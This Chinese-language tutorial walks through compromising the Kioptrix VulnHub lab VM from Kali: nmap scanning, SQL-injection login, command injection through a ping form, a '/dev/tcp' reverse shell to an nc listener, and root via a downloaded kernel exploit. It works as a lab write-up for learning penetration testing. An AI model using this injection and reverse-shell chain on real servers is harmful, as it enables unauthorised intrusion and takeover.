有許多人對神秘的黑客一直感興趣,卻苦于網(wǎng)上資料繁雜,無法入門,在學(xué)黑客之前,你要知道什么是黑客,黑客就是那些對計算機(jī)有著強(qiáng)烈探索欲的人,一個真正的黑客,必須要至少掌握一門編程技術(shù)和熟悉系統(tǒng)的操作命令。 下面我會實(shí)際演示一個黑客是如何通過一個普通的網(wǎng)站攻破服務(wù)器并獲取ROOT權(quán)限。
基礎(chǔ)環(huán)境準(zhǔn)備
1、安裝Vmware虛擬機(jī)(不建議使用真機(jī));
2、前往vulnhub下載測試鏡像,下載地址
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
3、用Vmware安裝下載鏡像,安裝完成后啟動服務(wù)器(這就是我們的目標(biāo)服務(wù)器了);
4、虛擬機(jī)安裝kali操作系統(tǒng),kali系統(tǒng)下載地址:
https://www.kali.org/downloads/(也可以選擇其它操作系統(tǒng),Kali關(guān)于滲透測試工具集成比較好);
以上基礎(chǔ)環(huán)境可谷歌、百度自行安裝,有問題可以反饋留言。
備注:目標(biāo)服務(wù)器和Kali服務(wù)器網(wǎng)絡(luò)需要配置同一個網(wǎng)段,默認(rèn)選擇Vmware的橋接模式即可。
操作流程
一、Kali系統(tǒng)IP查看
基礎(chǔ)環(huán)境準(zhǔn)備完畢,這時候需要打開我們的Kali服務(wù)器了,查看Kali服務(wù)器自身的IP,敲入ifconfig命令,查看到Kali系統(tǒng)自身IP地址為192.168.137.133。

二、掃描目標(biāo)服務(wù)器IP地址
nmap -sP 192.168.137.1/24
經(jīng)過nmap掃描后發(fā)現(xiàn),同網(wǎng)段有192.168.137.88 的IP,這個IP就是我們此行的目標(biāo)IP了。

三、掃描目標(biāo)服務(wù)器開放端口
nmap -A -p 1-65535 192.168.137.88 -v5
掃描192.168.137.88這臺服務(wù)器上開放的端口,發(fā)現(xiàn)目標(biāo)服務(wù)器開放的端口比較多,其中有常見的3306和80端口,相信有一定經(jīng)驗(yàn)的運(yùn)維或者開發(fā)人員都知道,這兩個端口代表MySQL服務(wù)和Http服務(wù),后面攻擊這臺服務(wù)器就會通過常見的80端口進(jìn)行操作

四、SQL注入操作
用瀏覽器訪問http://192.168.137.88,發(fā)現(xiàn)是個登錄頁面,嘗試用SQL注入,可登錄到管理后臺,此SQL注入原理是由于后臺服務(wù)對用戶輸入的參數(shù)沒有進(jìn)行校驗(yàn),直接進(jìn)行SQL拼接,導(dǎo)致出現(xiàn)該漏洞。

登錄后發(fā)現(xiàn)可看到管理員界面,這個界面是管理員用于查看機(jī)器是否能ping通的,測試輸入localhost,點(diǎn)擊submit,發(fā)現(xiàn)ping命令可以執(zhí)行,然后這時可以用&& 符號連接其他命令,發(fā)現(xiàn)都能正常執(zhí)行,這時想到我們可以利用反彈shell進(jìn)行操作。


五、反彈Shell操作
Kali機(jī)器執(zhí)行如下命令:
nc命令可以實(shí)現(xiàn)任意TCP/UDP端口的偵聽,這里nc是作為server以TCP或UDP方式偵聽4444端口(備注也可以指定其它端口)
nc -v -l -p 4444
瀏覽器上填寫如下命令:
此命令是實(shí)現(xiàn)反彈shell,sh -i 打開一個交互的sh,/dev/tcp建立一個socket連接,>&將標(biāo)準(zhǔn)錯誤輸出重定向到標(biāo)準(zhǔn)輸出中,0>&1將標(biāo)準(zhǔn)輸入重定向到標(biāo)準(zhǔn)輸出中。
localhost && sh -i >& /dev/tcp/192.168.137.133/4444 0>&1

這時候發(fā)現(xiàn)自己的Kali機(jī)器上已經(jīng)進(jìn)入shell操作界面,這時候的shell就已經(jīng)是目標(biāo)機(jī)器的shell了(偷偷的竊喜一波)

查看目前的用戶發(fā)現(xiàn)是Apache用戶,權(quán)限較低,無法創(chuàng)建、操作、刪除文件,也沒有權(quán)限進(jìn)行sudo操作,如下圖所示

六、提升權(quán)限到ROOT
這時執(zhí)行 uname -a 命令,發(fā)現(xiàn)該系統(tǒng)用到的內(nèi)核是2.6.9版本,如下圖所示。

這時候就可以去谷歌搜索該內(nèi)核版本是否存在高危漏洞,或者使用searchsploit工具進(jìn)行搜索,幸運(yùn)的是,網(wǎng)上已經(jīng)有人針對該內(nèi)核版本做過提權(quán)漏洞的腳本,如下圖。

通過wget把該文件下載到服務(wù)器上,由于操作的終端是反彈shell的終端,rz命令不可用。如果文件較內(nèi)容較少,可以手動編輯,這里我是直接本地用 Python -m SimpleHTTPServer起個簡單的靜態(tài)文件服務(wù),然后在服務(wù)器用wget命令下載。
下載完成后用gcc命令編譯,然后執(zhí)行編譯后的文件,此時發(fā)現(xiàn)權(quán)限已經(jīng)由普通的apache用戶提權(quán)到root用戶了,到此大功告成了,可以徹底做自己想做的事情了。
